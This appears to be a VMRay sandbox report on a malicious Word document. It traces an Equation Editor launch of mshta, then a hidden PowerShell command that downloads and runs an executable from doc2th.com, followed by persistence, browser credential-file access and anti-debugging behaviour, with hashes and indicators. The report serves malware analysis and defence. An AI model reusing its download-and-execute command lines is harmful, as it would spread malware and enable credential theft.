VMRay Analyzer Report for Sample #20883 (VMRay Analyzer 2.2.0)

Network resolution:
- URI doc2th.com resolved to address 192.232.251.15

Process tree (PID, image, parent PID, command line, working directory, image path):
- Process 1: PID 2396 winword.exe, parent PID 1552 (explorer.exe)
  Command line: "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
  Working directory: C:\Users\BGC6u8Oy yXGxkR\Desktop\
  Image: c:\program files\microsoft office\office15\winword.exe
- Process 2: PID 2548 eqnedt32.exe, parent PID 596
  Command line: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  Working directory: C:\Windows\system32\
  Image: c:\program files\common files\microsoft shared\equation\eqnedt32.exe
- Process 3: PID 2584 mshta.exe, parent PID 2548 (eqnedt32.exe)
  Command line: mShta http://doc2th.com/tin/foobaz.txt &AAAA (trailing bytes are mis-encoded in the original)
  Working directory: C:\Windows\system32\
  Image: c:\windows\system32\mshta.exe
- Process 4: PID 1012 svchost.exe, parent PID 476
  Command line: C:\Windows\system32\svchost.exe -k LocalService
  Working directory: C:\Windows\system32\
  Image: c:\windows\system32\svchost.exe
- Process 5: PID 2884 powershell.exe, parent PID 2584 (mshta.exe)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\Users\BGC6U8~1\AppData\Local\Temp/lambdoidtegument.exe');C:\Users\BGC6U8~1\AppData\Local\Temp/lambdoidtegument.exe
  Working directory: C:\Windows\system32\
  Image: c:\windows\system32\windowspowershell\v1.0\powershell.exe
- Process 6: PID 2948 lambdoidtegument.exe, parent PID 2884 (powershell.exe)
  Command line: "C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe"
  Working directory: C:\Windows\system32\
  Image: c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe
- Process 7: PID 1552 explorer.exe, parent PID 18446744073709551615 (0xFFFFFFFFFFFFFFFF, i.e. no parent recorded)
  Command line: C:\Windows\Explorer.EXE
  Working directory: C:\Windows\system32\
  Image: c:\windows\explorer.exe
- Process 8: PID 3028 cmmon32.exe, parent PID 1552 (explorer.exe)
  Command line: "C:\Windows\System32\cmmon32.exe"
  Working directory: C:\Windows\system32\
  Image: c:\windows\system32\cmmon32.exe
- Process 9: PID 3200 cmd.exe, parent PID 3028 (cmmon32.exe)
  Command line: cmd.exe /c del "C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe"
  Working directory: C:\Windows\system32\
  Image: c:\windows\system32\cmd.exe
- Process 10: PID 712 svchost.exe, parent PID 476
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  Working directory: C:\Windows\system32\
  Image: c:\windows\system32\svchost.exe
- Process 11: PID 3300 firefox.exe, parent PID 3028 (cmmon32.exe)
  Command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"
  Working directory: C:\Windows\system32\
  Image: c:\program files\mozilla firefox\firefox.exe
Downloaded payload:
- c:\users\bgc6u8oy yxgxkr\appdata\local\temp\lambdoidtegument.exe (type: exe)
  MD5: 437efd63bf864669ef4312750c25c462
  SHA1: 247f0b1576c24e50830f6ee326dce494c6ba478d
  SHA256: c5221c1250b9584be4be97a30dde5f1b82c3509749df7bf76a7d0c9d85514a5a
- Mutex: Global\.net clr networking
Network artifacts:
- DNS record: doc2th.com
- Socket / connection: 192.232.251.15:80 TCP (doc2th.com:80), HTTP
- URI: doc2th.com/tin/off.exe

Registry keys read:
- HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
- HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds: value PipelineMaxStackSizeMB
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors

File artifacts:
- \??\C:\Windows\SYSTEM32\ntdll.dll (dll)
- \??\C:\Windows\System32\cmmon32.exe (exe)
- \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Temp\lambdoidtegument.exe (exe)
- \??\C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe (exe)
- \??\C:\Windows\System32\drivers\etc\hosts
- \??\C:\Program Files\Crfitq6x\gdigzvh.exe (exe)
- \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS- (directory)
- \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlog.ini (ini)
- \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini (ini)
- \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrv.ini (ini)
- \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data
- \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera Software\Opera Stable\Login Data
- \??\C:\Program Files\Mozilla Firefox\Firefox.exe (exe)

Mutexes:
- 664908S9UTEIZ6MN
- OLO0NDS-0AXWwKzG

Registry artifacts (the user hive HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000 is abbreviated as "user hive" below):
- user hive\SOFTWARE\Microsoft\Windows\CurrentVersion\Run: value VFIL_RNHERNX = "C:\Program Files\Crfitq6x\gdigzvh.exe" (REG_SZ)
- user hive\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 and its subkeys 00000001 and 00000002
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion: value ProductName
- HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\: value CurrentVersion
- HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\25.0 (en-US)\Main: value Install Directory
- user hive\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
- user hive\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ and the profile section subkeys beneath it: 0413e2ad850e7146953cbb4c2672287e, 0a0d020000000000c000000000000046, 13dbb0c8aa05101a9bb000aa002fc45a, 1b5aad0cdb629e49a2c6203d4a6a948a, 1dab3177c2ac33448a4fe54b862a329e, 2a7b899b94a04042a46a1cd96dc2a18c
- HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ profile section subkeys (continued): 3517490d76624c419a828607e2a54604, 7a302ee0804dab4ba930ea4351b9b4ac, 7df1ae4ad074c146bb02f647b97dd78e, 8503020000000000c000000000000046, 9207f3e0a3b11019908b08002b2a56c2
- HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird\
- File: c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe (exe)
- HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
- HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor and HKEY_CURRENT_USER\Software\Microsoft\Command Processor: values DisableUNCCheck, EnableExtensions, DelayedExpansion, DefaultColor, CompletionChar, PathCompletionChar, AutoRun
- File: \??\C:\Windows\SYSTEM32\ntdll.dll (dll)

Analyzed Sample #20883 - Malware Artifacts
Sample-ID: #20883
Job-ID: #16520
Submission-ID: #21792
This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system.
VTI Score: 0 (based on VTI Database Version 2.6)

Metadata of Sample File #20883:
- Path: C:\Users\BGC6u8Oy yXGxkR\Desktop\WhitePaper.doc (type: doc)
- MD5: 30926dda00ebf82f1355217d4285980f
- SHA1: d1b8a2414232fbeb997dcb4fdc1d9969137a5445
- SHA256: 1c0a1a7c695d5e1a7497b7fa4f75cf83f12265eaca2297b3d72461d110fcb079

Metadata of Analysis for Job-ID #16520:
- Timeout: False
- Architecture: x86 32-bit PAE
- VM image: win7_32_sp1-mso2013, True (unlabelled boolean field in the original)
- OS: Windows 7 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1)
- 140.344 (unlabelled numeric field in the original)

VTI rule matches (category, score, rule, description, classification):
- Process, 1/5, vmray_install_ipc_endpoint: Create mutex with name "Local\!PrivacIE!SharedMemory!Mutex". (Create system object)
- Process, 4/5, vmray_document_create_process: Create process "C:\Windows/system32/WindowsPowerShell/v1.0/powershell.exe". (Create process)
- Process, 1/5, vmray_install_ipc_endpoint: Create mutex with name "Global\.net clr networking". (Create system object)
- Network, 3/5, vmray_request_dns_by_name: Resolve host name "doc2th.com". (Perform DNS request)
- Process, 4/5, vmray_document_create_process: Create process "C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe". (Create process)
- Process, 1/5, vmray_install_ipc_endpoint: Create nameless mutex. (Create system object)
- File System, 5/5, vmray_create_file_in_os_dir: Create file "\??\C:\Windows\SYSTEM32\ntdll.dll" in the OS directory. (Modify operating system directory)
- File System, 5/5, vmray_overwrite_file_in_os_dir: Modify file "\??\C:\Windows\SYSTEM32\ntdll.dll" in the OS directory. (Modify operating system directory)
- Anti Analysis, 5/5, vmray_detect_kernel_debugger_by_api: Check via API "NtQuerySystemInformation". (Try to detect kernel debugger)
- Anti Analysis, 4/5, vmray_detect_debugger_by_api: Check via API "NtQueryInformationProcess". (Try to detect debugger)
- File System, 5/5, vmray_create_file_in_os_dir: Create file "\??\C:\Windows\System32\cmmon32.exe" in the OS directory. (Modify operating system directory)
- File System, 5/5, vmray_overwrite_file_in_os_dir: Modify file "\??\C:\Windows\System32\cmmon32.exe" in the OS directory. (Modify operating system directory)
- Anti Analysis, 5/5, vmray_illegitimate_api_usage_by_create_process_internal: Internal API "CreateProcessInternalW" was used to start "C:\Windows\System32\cmmon32.exe". (Illegitimate API usage)
- Process, 4/5, vmray_document_create_process: Create process "C:\Windows\System32\cmmon32.exe". (Create process)
- Process, 4/5, vmray_read_from_remote_process: "c:\windows\explorer.exe" reads from "C:\Windows\System32\cmmon32.exe". (Read from memory of another process)
- Anti Analysis, 3/5, vmray_delay_execution_by_sleep: One thread sleeps more than 5 minutes. (Delay execution)
- Process, 4/5, vmray_read_from_remote_process: "c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe" reads from "c:\windows\explorer.exe". (Read from memory of another process)
- Process, 1/5, vmray_install_ipc_endpoint: Create mutex with name "664908S9UTEIZ6MN". (Create system object)
- Process, 1/5, vmray_install_ipc_endpoint: Create mutex with name "OLO0NDS-0AXWwKzG". (Create system object)
- Anti Analysis, 5/5, vmray_illegitimate_api_usage_by_create_process_internal: Internal API "CreateProcessInternalW" was used to start "C:\Windows\System32\cmd.exe". (Illegitimate API usage)
- Process, 4/5, vmray_document_create_process: Create process "C:\Windows\System32\cmd.exe". (Create process)
- File System, 5/5, vmray_create_file_in_os_dir: Create file "\??\C:\Windows\System32\drivers\etc\hosts" in the OS directory. (Modify operating system directory)
- File System, 5/5, vmray_overwrite_file_in_os_dir: Modify file "\??\C:\Windows\System32\drivers\etc\hosts" in the OS directory. (Modify operating system directory)
- Network, 4/5, vmray_read_hosts_file: Read the current network configuration through the host.conf file. (Read network configuration)
- Process, 4/5, vmray_read_from_remote_process: "c:\windows\system32\cmmon32.exe" reads from "c:\windows\explorer.exe". (Read from memory of another process)
- Persistence, 3/5, vmray_install_startup_script_by_registry: Add "C:\Program Files\Crfitq6x\gdigzvh.exe" to Windows startup via registry. (Install system startup script or application)
- Anti Analysis, 5/5, vmray_illegitimate_api_usage_by_create_process_internal: Internal API "CreateProcessInternalW" was used to start "C:\Program Files\Mozilla Firefox\Firefox.exe". (Illegitimate API usage)
- Process, 4/5, vmray_document_create_process: Create process "C:\Program Files\Mozilla Firefox\Firefox.exe". (Create process)
- Process, 4/5, vmray_read_from_remote_process: "c:\windows\system32\cmmon32.exe" reads from "C:\Program Files\Mozilla Firefox\Firefox.exe". (Read from memory of another process)